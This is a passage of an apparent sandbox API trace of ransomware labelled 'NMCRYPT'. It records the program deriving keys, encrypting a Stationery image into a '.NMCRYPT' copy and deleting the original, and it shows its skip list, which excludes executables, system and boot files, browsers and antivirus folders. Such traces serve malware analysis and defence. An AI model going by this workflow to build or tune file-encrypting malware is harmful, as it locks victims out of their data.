[0164.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.851] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0164.851] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0164.851] CryptCreateHash (in: hProv=0x8e33b8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x60d07c | out: phHash=0x60d07c) returned 1 [0164.851] CryptHashData (hHash=0x9ad5f8, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0164.851] CryptDeriveKey (in: hProv=0x8e33b8, Algid=0x6610, hBaseData=0x9ad5f8, dwFlags=0x4, phKey=0x60d080 | out: phKey=0x60d080*=0x9ad738) returned 1 [0164.851] CryptSetKeyParam (hKey=0x9ad738, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0164.851] CryptSetKeyParam (hKey=0x9ad738, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0164.851] wcslen (_String="\\\\?\\") returned 0x4 [0164.851] CryptDuplicateKey (in: hKey=0x9ad738, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad278) returned 1 [0164.851] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Pine_Lumber.jpg.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\pine_lumber.jpg.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a4 [0164.876] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Pine_Lumber.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\pine_lumber.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x690 [0164.876] GetFileSizeEx (in: hFile=0x690, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=3981) returned 1 [0164.876] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0164.877] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.878] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.878] GetLastError () returned 0x0 [0164.878] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.891] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.892] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.892] GetLastError () returned 0x0 [0164.892] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.892] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.892] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.892] GetLastError () returned 0x0 [0164.892] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.892] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.892] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.892] GetLastError () returned 0x0 [0164.892] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.892] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.892] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.892] GetLastError () returned 0x0 [0164.892] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.892] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.892] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.892] GetLastError () returned 0x0 [0164.892] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.892] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.892] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.892] GetLastError () returned 0x0 [0164.892] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.892] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.893] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.893] GetLastError () returned 0x0 [0164.893] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.893] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.893] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.893] GetLastError () returned 0x0 [0164.893] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.893] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.893] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.893] GetLastError () returned 0x0 [0164.893] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.893] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.893] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.893] GetLastError () returned 0x0 [0164.893] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.893] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.893] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.893] GetLastError () returned 0x0 [0164.893] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.893] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.893] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.893] GetLastError () returned 0x0 [0164.893] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.893] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.893] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.893] GetLastError () returned 0x0 [0164.893] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.894] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.894] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.894] GetLastError () returned 0x0 [0164.894] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.894] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x8d, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x8d, lpOverlapped=0x0) returned 1 [0164.894] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x8d, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x90) returned 1 [0164.894] GetLastError () returned 0x0 [0164.894] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x90, lpOverlapped=0x0) returned 1 [0164.894] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0164.894] WriteFile (in: hFile=0x6a4, lpBuffer=0x2891f68*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0164.894] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Pine_Lumber.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\pine_lumber.jpg")) returned 0x20 [0164.894] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Pine_Lumber.jpg", dwFileAttributes=0x20) returned 0 [0164.894] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Pine_Lumber.jpg") returned 1 [0164.895] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Pine_Lumber.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\pine_lumber.jpg")) returned 0 [0164.895] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Pine_Lumber.jpg" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Pine_Lumber.jpg") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Pine_Lumber.jpg" [0164.895] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Pine_Lumber.jpg" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery") returned 1 [0164.895] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF78D.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf78d.tmp")) returned 0xf78d [0164.895] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Pine_Lumber.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\pine_lumber.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF78D.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf78d.tmp"), dwFlags=0x1) returned 0 [0164.896] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF78D.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf78d.tmp")) returned 1 [0164.896] CryptDestroyKey (hKey=0x9ad278) returned 1 [0164.896] wcslen (_String="OK") returned 0x2 [0164.896] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0164.896] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0164.896] CryptDestroyKey (hKey=0x9ad738) returned 1 [0164.896] CryptDestroyHash (hHash=0x9ad5f8) returned 1 [0164.896] CryptReleaseContext (hProv=0x8e33b8, dwFlags=0x0) returned 1 [0164.896] FindNextFileW (in: hFindFile=0x9ad238, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0164.896] PathMatchSpecW (pszFile="Pretty_Peacock.jpg", pszSpec="*NMCRYPT") returned 0 [0164.896] PathMatchSpecW (pszFile="Pretty_Peacock.jpg", pszSpec="*Recovers your files.html") returned 0 [0164.896] PathMatchSpecW (pszFile="Pretty_Peacock.jpg", pszSpec="*.exe") returned 0 [0164.896] PathMatchSpecW (pszFile="Pretty_Peacock.jpg", pszSpec="*.dll") returned 0 [0164.896] PathMatchSpecW (pszFile="Pretty_Peacock.jpg", pszSpec="*.lnk") returned 0 [0164.896] PathMatchSpecW (pszFile="Pretty_Peacock.jpg", pszSpec="*.bat") returned 0 [0164.896] PathMatchSpecW (pszFile="Pretty_Peacock.jpg", pszSpec="*.ini") returned 0 [0164.896] PathMatchSpecW (pszFile="Pretty_Peacock.jpg", pszSpec="*.msi") returned 0 [0164.896] PathMatchSpecW (pszFile="Pretty_Peacock.jpg", pszSpec="*.scf") returned 0 [0164.896] PathMatchSpecW (pszFile="Pretty_Peacock.jpg", pszSpec="*pagefile.sys*") returned 0 [0164.896] PathMatchSpecW (pszFile="Pretty_Peacock.jpg", pszSpec="*NTUSER.DAT*") returned 0 [0164.896] PathMatchSpecW (pszFile="Pretty_Peacock.jpg", pszSpec="*AppData*") returned 0 [0164.896] PathMatchSpecW (pszFile="Pretty_Peacock.jpg", pszSpec="*\\winrar\\*") returned 0 [0164.896] PathMatchSpecW (pszFile="Pretty_Peacock.jpg", pszSpec="*\\Internet Explorer\\*") returned 0 [0164.896] PathMatchSpecW (pszFile="Pretty_Peacock.jpg", pszSpec="*\\java\\*") returned 0 [0164.896] PathMatchSpecW (pszFile="Pretty_Peacock.jpg", pszSpec="*\\TeamViewer\\*") returned 0 [0164.896] PathMatchSpecW (pszFile="Pretty_Peacock.jpg", pszSpec="*\\windows\\*") returned 0 [0164.896] PathMatchSpecW (pszFile="Pretty_Peacock.jpg", pszSpec="*\\ESET\\*") returned 0 [0164.896] PathMatchSpecW (pszFile="Pretty_Peacock.jpg", pszSpec="*\\AVG\\*") returned 0 [0164.896] PathMatchSpecW (pszFile="Pretty_Peacock.jpg", pszSpec="*\\AVIRA\\*") returned 0 [0164.896] PathMatchSpecW (pszFile="Pretty_Peacock.jpg", pszSpec="*\\AVAST Software\\*") returned 0 [0164.896] PathMatchSpecW (pszFile="Pretty_Peacock.jpg", pszSpec="*Atheros*") returned 0 [0164.897] PathMatchSpecW (pszFile="Pretty_Peacock.jpg", pszSpec="*Realtek*") returned 0 [0164.897] PathMatchSpecW (pszFile="Pretty_Peacock.jpg", pszSpec="*bootmgr*") returned 0 [0164.897] PathMatchSpecW (pszFile="Pretty_Peacock.jpg", pszSpec="*boot*") returned 0 [0164.897] PathMatchSpecW (pszFile="Pretty_Peacock.jpg", pszSpec="*boot*") returned 0 [0164.897] PathMatchSpecW (pszFile="Pretty_Peacock.jpg", pszSpec="*CONFIG.SYS*") returned 0 [0164.897] PathMatchSpecW (pszFile="Pretty_Peacock.jpg", pszSpec="*IO.SYS*") returned 0 [0164.897] PathMatchSpecW (pszFile="Pretty_Peacock.jpg", pszSpec="*MSDOS.SYS*") returned 0 [0164.897] PathMatchSpecW (pszFile="Pretty_Peacock.jpg", pszSpec="*NTDETECT.COM*") returned 0 [0164.897] PathMatchSpecW (pszFile="Pretty_Peacock.jpg", pszSpec="*ntldr*") returned 0 [0164.897] PathMatchSpecW (pszFile="Pretty_Peacock.jpg", pszSpec="*chrome*") returned 0 [0164.897] PathMatchSpecW (pszFile="Pretty_Peacock.jpg", pszSpec="*opera*") returned 0 [0164.897] PathMatchSpecW (pszFile="Pretty_Peacock.jpg", pszSpec="*firefox*") returned 0 [0164.897] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Pretty_Peacock.jpg", pszSpec="*") returned 1 [0164.897] strlen (_Str="NMoreira") returned 0x8 [0164.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 